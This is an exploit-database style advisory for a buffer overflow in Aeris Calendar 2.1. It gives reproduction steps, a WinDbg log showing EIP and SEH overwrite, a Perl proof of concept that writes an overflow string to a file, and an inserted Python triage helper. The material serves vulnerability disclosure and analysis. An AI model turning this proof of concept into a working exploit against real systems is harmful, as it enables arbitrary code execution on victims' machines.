- Title : Aeris Calendar 2.1 - Buffer Overflow Vulnerability
- Author : ZwX
- Date : 27/11/2015
- Software Link : http://www.esumsoft.com/download/?prod=aeriscalendar
- Vendor : http://www.esumsoft.com/
- Tested On : Windows 7 & Windows XP SP3
===============================
* Vulnerability Description : *
===============================
A classic buffer overflow vulnerability exists in Aeris Calendar. An attacker
can control the EIP register and thereby choose the next instruction to execute,
for example to execute arbitrary code.
=================================================
* Manual steps to reproduce the vulnerability : *
=================================================
1. Launch Aeris Calendar.exe
2. Click Weather -> Set Location
3. Copy the AAAA... string from bof.txt to the clipboard
4. Paste it into the "Enter your city or zip code" input and click Search
5. The software will crash
=================================
* Debug Session Logs [WinDbg] : *
=================================
Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=43434343 edx=77ce72cd esi=00000000 edi=00000000
eip=43434343 esp=0012cbe8 ebp=0012cc08 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
43434343 ?? ???
0:000> !exchain
0012cbfc: ntdll!RtlRaiseStatus+c8 (77ce72cd)
0012cfe4: ntdll!RtlRaiseStatus+c8 (77ce72cd)
0012f404: 43434343
Invalid exception stack at 42424242
0:000> d 0012f404
0012f404 42 42 42 42 43 43 43 43-00 00 00 00 80 32 44 00 BBBBCCCC.....2D. <== Control Register EIP
0012f414 a0 e6 1e 0b 01 00 00 00-08 be 51 00 60 f5 12 00 ..........Q.`...
0012f424 11 01 00 00 dd 92 38 00-fe ff ff ff c3 60 cf 77 ......8......`.w
0012f434 d0 5d cf 77 10 00 00 00-00 00 00 00 00 00 00 00 .].w............
0012f444 00 00 22 00 00 00 00 00-00 00 00 00 f4 f4 12 00 ..".............
0012f454 00 04 00 00 c0 01 05 00-f4 f4 12 00 00 00 00 00 ................
0012f464 fe ff ff ff fe c5 7f 77-94 52 7f 77 04 00 00 00 .......w.R.w....
0012f474 f2 64 4e 00 72 01 04 00-e7 c4 7f 77 c0 01 05 00 .dN.r......w....
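Added example, not part of the original advisory: a short Python triage helper that reads a WinDbg excerpt like the one above and reports whether EIP and the exception handler chain hold repeated filler bytes from the input. The log text is copied from this page; the function names and the "filler" heuristic (one printable byte repeated four times) are assumptions made for the example.

```python
import re

# Excerpt of the WinDbg output above, copied from this page.
SAMPLE_LOG = """\
Access violation - code c0000005 (first chance)
eax=00000000 ebx=00000000 ecx=43434343 edx=77ce72cd esi=00000000 edi=00000000
eip=43434343 esp=0012cbe8 ebp=0012cc08 iopl=0 nv up ei pl zr na pe nc
0:000> !exchain
0012cbfc: ntdll!RtlRaiseStatus+c8 (77ce72cd)
0012cfe4: ntdll!RtlRaiseStatus+c8 (77ce72cd)
0012f404: 43434343
Invalid exception stack at 42424242
"""

def is_filler(value):
    """True when a 32-bit value is one printable ASCII byte repeated four times."""
    raw = value.to_bytes(4, "little")
    return len(set(raw)) == 1 and 0x20 <= raw[0] < 0x7F

def triage(log):
    """Summarise register and SEH-chain evidence that input reached control data."""
    regs = {name: int(val, 16)
            for name, val in re.findall(r"\b(e[a-z]{2})=([0-9a-f]{8})\b", log)}
    chain = []
    # !exchain lines: "record: module!symbol+off (handler)" or "record: handler"
    for rec, sym, bare in re.findall(
            r"^([0-9a-f]{8}): (?:.*\(([0-9a-f]{8})\)|([0-9a-f]{8}))[ \t]*$", log, re.M):
        chain.append((int(rec, 16), int(sym or bare, 16)))
    bad_next = re.search(r"Invalid exception stack at ([0-9a-f]{8})", log)
    eip = regs.get("eip")
    hijacked = [(rec, handler) for rec, handler in chain if is_filler(handler)]
    return {
        "eip": eip,
        "eip_is_filler": eip is not None and is_filler(eip),
        "filler_registers": sorted(r for r, v in regs.items() if is_filler(v)),
        "overwritten_seh_records": hijacked,
        "eip_from_seh_handler": any(handler == eip for _, handler in hijacked),
        "next_record_is_filler": bool(bad_next) and is_filler(int(bad_next.group(1), 16)),
    }

if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

When `eip_from_seh_handler` is true, the faulting EIP value matches a handler pointer in an overwritten exception registration record, which is the case SafeSEH and SEHOP are designed to stop.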
===========================
* Proof Of Concept Perl : *
===========================
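use strict;
use warnings;

# 8186 filler bytes, then the two 4-byte markers that show up in the
# debug log above as 42424242 and 43434343.
my $Buff  = "\x41" x 8186;
my $Buff1 = "\x42" x 4;
my $Buff2 = "\x43" x 4;

open(my $fh, '>', 'File.txt') or die "Cannot open File.txt: $!";
print $fh $Buff . $Buff1 . $Buff2;
close($fh);
print " POC Created by ZwX\n";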
# 0day.today [2018-04-14] #